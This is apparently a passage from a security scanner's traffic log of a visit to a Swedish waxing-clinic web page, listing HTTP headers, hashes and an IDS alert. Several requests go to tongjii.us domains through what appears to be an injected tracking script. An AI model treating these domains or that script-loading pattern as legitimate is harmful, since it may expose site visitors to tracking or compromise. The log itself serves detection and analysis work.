Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:46 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    213604992811d0287e05f1b6af92d2b6
Sha1:   d4ef6ea20788cd5078286d133b399a3647d3aed9
Sha256: f9f3624e33badc1b935e9f293a212c053b23425af6e5f7da875ebf97972a3d27
                                        
                                            GET /click/cookie.php?names=tb_cps&jsoncallback=jsonp1498835562967&_=1498835564934 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:46 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    c287098dd3c81b701372272ccadcfbb2
Sha1:   814cb561c8c7e13bc5ce32a7b0e481237a68b07c
Sha256: ccb02a81dc0706c036d67ad199262e7a94b7d63c8c07d6a34d5a731979055730
                                        
GET /click/cookie.php?names=sbj_tiao||sbj_jd&jsoncallback=jsonp1498835562966&_=1498835564929 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Fri, 30 Jun 2017 15:12:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:46 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    381cb46557b8b65e6f09c145b82abb8a
Sha1:   4847610951b212a72d19b4503eb0bcd3d51c52c4
Sha256: 1f39659c6468e344baa73e36a8871f4d377da068aaef7e9866918c3b0c8fb569
                                        
GET /click/cookie.php?name=sbj_tiao&save=1&jsoncallback=jsonp1498835562969&_=1498835566931 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: iscookiesName=1

                                         
106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Fri, 30 Jun 2017 15:12:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600 sbj_tiao=1; expires=Sat, 01-Jul-2017 03:12:47 GMT; Max-Age=43200 statusName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    048baf184dce3d20f16620e02e6ca17e
Sha1:   0e83e81c34e357fdb420d7f0b8eeaabfc6ffd460
Sha256: 6a58e41b1e04ce42f992182203a6dbfa0efcc0667541a474bde3e46d7c67f3fc
                                        
GET /click/cookie.php?name=tb_cps&times=6&save=1&jsoncallback=jsonp1498835562970&_=1498835566935 HTTP/1.1
Host: cookie.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: iscookiesName=1

                                         
106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: nginx
Date: Fri, 30 Jun 2017 15:12:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600 tb_cps=1; expires=Fri, 30-Jun-2017 21:12:47 GMT; Max-Age=21600 statusName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    7ad9fa59bf18cfe60c0ae1f9728caac5
Sha1:   6dfe0650d52a3bba1edcda1c00f6dfee79c37814
Sha256: 6cbae657d3b8fe8df6a26b345dc138997c410e366adbaa1c69877cf8bc7ec534
                                        
GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1
Host: lib.tongjii.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
If-Modified-Since: Wed, 28 Jun 2017 00:54:20 GMT
If-None-Match: "5952fe3c-248"

                                         
103.230.122.162
HTTP/1.1 304 Not Modified
Server: nginx
Date: Fri, 30 Jun 2017 15:10:47 GMT
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Connection: keep-alive
Etag: "5952fe3c-248"


--- Additional Info ---
                                        
GET /iplookup/iplookup.php?format=js&_=1498835567216 HTTP/1.1
Host: int.dpool.sina.com.cn
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
180.149.138.197
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Sina
Date: Fri, 30 Jun 2017 15:12:47 GMT
Content-Length: 143
Connection: close
DPOOL_HEADER: tyr106
Set-Cookie: INTDPOOL=cb85cb75f7eb9cc5f37b34f3a3b7fb7e;Path=/
POOLPOOL: intdpool
DPOOL_LB7_HEADER: apollo219


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   143
Md5:    351247e451bbb4433a64a2a0b048b3af
Sha1:   3e58a14d1850dc54f2207daec6ef6e652fde1f03
Sha256: e0aa1b242087dab772bd1b038283611e3de00d8e216d5c090315147255ac4354

Alerts:
  IDS:
    - ET POLICY External IP Lookup sina.com.cn
                                        
GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1
Host: track.adtraction.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8

                                         
82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:47 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:47 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
GET /imp?type(js)pool(450314)a(1978982)307049898 HTTP/1.1
Host: impse.tradedoubler.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
52.50.135.241
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Fri, 30 Jun 2017 15:12:47 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: BT=1z11zzQtzWfFNLzZVTDl69zzAx1zByZVTDl69;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com PI=1z11z1zQtz1mLi8kz9bU4y1y1PQ06y1eGbyyy233yKCZy25er8eyyy2BLQ;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com UI=1z11zzQtz1hXXu6zJWhyAXGC;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com PL=1z11zzQtz187aHxz2Ho2yELg4yBdS0yy-3FiO48y33iW0w1;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1
                                        
GET /img/Girls_Massage_015223_BW.jpg HTTP/1.1
Host: www.hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hudterapeuter.com/styles.css

                                         
195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/jpeg
Date: Fri, 30 Jun 2017 15:12:47 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:47 GMT
Etag: "463bd79-3e2cf-4fe4f0b0a7cf6"
Accept-Ranges: bytes
Content-Length: 254671
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   254671
Md5:    7e9d1899b2a25bf1938f3193503476f1
Sha1:   69c8bb25bc72efa15e8fc5db6dbffacc44f0beb6
Sha256: 14a08ffd947d50ad3bcc806a338afe6132cf0a9b1668008f9628b3a8b58bd138
                                        
GET /imp?type(js)pool(450314)a(1978982)115778382 HTTP/1.1
Host: impse.tradedoubler.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: BT=1z11zzQtzWfFNLzZVTDl69zzAx1zByZVTDl69; PI=1z11z1zQtz1mLi8kz9bU4y1y1PQ06y1eGbyyy233yKCZy25er8eyyy2BLQ; UI=1z11zzQtz1hXXu6zJWhyAXGC; PL=1z11zzQtz187aHxz2Ho2yELg4yBdS0yy-3FiO48y33iW0w1

                                         
52.50.135.241
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Fri, 30 Jun 2017 15:12:47 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: PI=1z11z1zQtz1mLi8kz9bU4y1y1PQ06y1eGbyyy233yKCZy25er8eyyy2BLQ;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com PL=1z11zzQtz187aisz2Ho2yELg4yBdS0yy-3FiO48y33iW0w2;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1
                                        
GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1
Host: track.adtraction.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8

                                         
82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:48 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:48 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
GET /bilder/gymgrossisten/TD/bs_140x350.gif HTTP/1.1
Host: www.gymgrossisten.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
104.123.147.187
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache
Etag: "5eb1946de8b76ed4faa6fff311a5b582:1483950069"
Last-Modified: Mon, 09 Jan 2017 08:21:09 GMT
Accept-Ranges: bytes
Content-Length: 33079
Date: Fri, 30 Jun 2017 15:12:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 140 x 350
Size:   33079
Md5:    5eb1946de8b76ed4faa6fff311a5b582
Sha1:   8950df3523ad121924cfbff594201cd9386af0d1
Sha256: f9920db9a3a329a4e1e4f5010f9e5afbf52a3f2d4b32e9b2868b4303d4ef3aa3
                                        
GET /ga.js HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Fri, 30 Jun 2017 13:32:07 GMT
Expires: Fri, 30 Jun 2017 15:32:07 GMT
Last-Modified: Tue, 06 Jun 2017 00:25:39 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 16022
Cache-Control: public, max-age=7200
Age: 6041


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16022
Md5:    09889dfa1a6bf800507b7a6799c45901
Sha1:   51b1c3f117a0874b6e5ea58bf9e8863c918db4aa
Sha256: 1c92948832be823e16d40195f5f66135368b5cb3f8a7833c3e25f558f16fecfb
                                        
GET /r/__utm.gif?utmwv=5.6.7&utms=1&utmn=680843561&utmhn=hudterapeuter.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x737&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Hudbehandlingar%20inom%20vaxning%20i%20Malm%C3%B6%20av%20hudterapeuter.&utmhid=347902094&utmr=-&utmp=%2Fmalmo%2Fvaxning&utmht=1498835569320&utmac=UA-8590313-3&utmcc=__utma%3D105502362.928101206.1498835569.1498835569.1498835569.1%3B%2B__utmz%3D105502362.1498835569.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1327966859&utmredir=1&utmu=DAAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1
Host: www.google-analytics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
216.58.211.142
HTTP/1.1 200 OK
Content-Type: image/gif
Access-Control-Allow-Origin: *
Date: Fri, 30 Jun 2017 15:12:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
GET /favicon.ico HTTP/1.1
Host: hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=unjgabmep56956jermppv9kah7; __utma=105502362.928101206.1498835569.1498835569.1498835569.1; __utmb=105502362.1.10.1498835569; __utmc=105502362; __utmz=105502362.1498835569.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

                                         
195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Fri, 30 Jun 2017 15:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text
Size:   10686
Md5:    69f7e10f93efcddae55ceb77f225c1c6
Sha1:   51df6f20068bd672dd975afa5f695904b589e4c2
Sha256: 5049d3ea5116bc22738fa2b04aa85c91def839d36d35f6404d01ba5c7173bd4f
                                        
GET /favicon.ico HTTP/1.1
Host: hudterapeuter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=unjgabmep56956jermppv9kah7; __utma=105502362.928101206.1498835569.1498835569.1498835569.1; __utmb=105502362.1.10.1498835569; __utmc=105502362; __utmz=105502362.1498835569.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

                                         
195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Fri, 30 Jun 2017 15:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---